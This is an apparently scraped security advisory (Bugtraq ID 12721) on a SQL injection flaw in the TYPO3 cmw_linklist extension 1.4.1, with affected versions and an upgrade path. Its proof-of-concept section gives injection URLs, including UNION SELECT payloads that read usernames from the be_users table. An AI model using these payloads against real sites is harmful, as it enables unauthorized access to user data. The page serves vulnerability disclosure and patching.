Typo3 CMW_Linklist Extension SQL Injection Vulnerability
BID:12721
Info
Typo3 CMW_Linklist Extension SQL Injection Vulnerability
| Bugtraq ID: | 12721 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 03 2005 12:00AM |
| Updated: | Mar 03 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Fabian Becker <[email protected]>. |
| Vulnerable: |
Sebastian Faulhaber cmw_linklist 1.4.1 |
| Not Vulnerable: |
Sebastian Faulhaber cmw_linklist 1.5 .0 |
Discussion
Typo3 CMW_Linklist Extension SQL Injection Vulnerability
Typo3 'cmw_linklist' extension is affected by a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in a SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
This issue is reported to affect 'cmw_linklist' extension versions 1.4.1 and earlier.
Typo3 'cmw_linklist' extension is affected by a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in a SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
This issue is reported to affect 'cmw_linklist' extension versions 1.4.1 and earlier.
Exploit / POC
Typo3 CMW_Linklist Extension SQL Injection Vulnerability
No exploit is required.
The following proof of concept is available:
http://www.example.com/[LinksSection]?&no_cache=1&action=getviewcategory&category_uid=1%20or%201=1
Gulftech Security Research has supplied the following additional proof of concepts:
A test for vulnerability:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1/*
Lists user names and categories:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201/*
No exploit is required.
The following proof of concept is available:
http://www.example.com/[LinksSection]?&no_cache=1&action=getviewcategory&category_uid=1%20or%201=1
Gulftech Security Research has supplied the following additional proof of concepts:
A test for vulnerability:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1/*
Lists user names and categories:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201/*
Solution / Fix
Typo3 CMW_Linklist Extension SQL Injection Vulnerability
Solution:
An upgrade to the 'cmw_linklist' extension has been made available:
Sebastian Faulhaber cmw_linklist 1.4.1
Solution:
An upgrade to the 'cmw_linklist' extension has been made available:
Sebastian Faulhaber cmw_linklist 1.4.1
-
Typo3 cmw_linklist 1.5.0
http://typo3.org/extensions/repository/search/cmw_linklist/details/
References
Typo3 CMW_Linklist Extension SQL Injection Vulnerability
References:
References:
- Synnefoims Homepage (synnefoims)
- TYPO3 SQL Injection vunerabilitie (Fabian Becker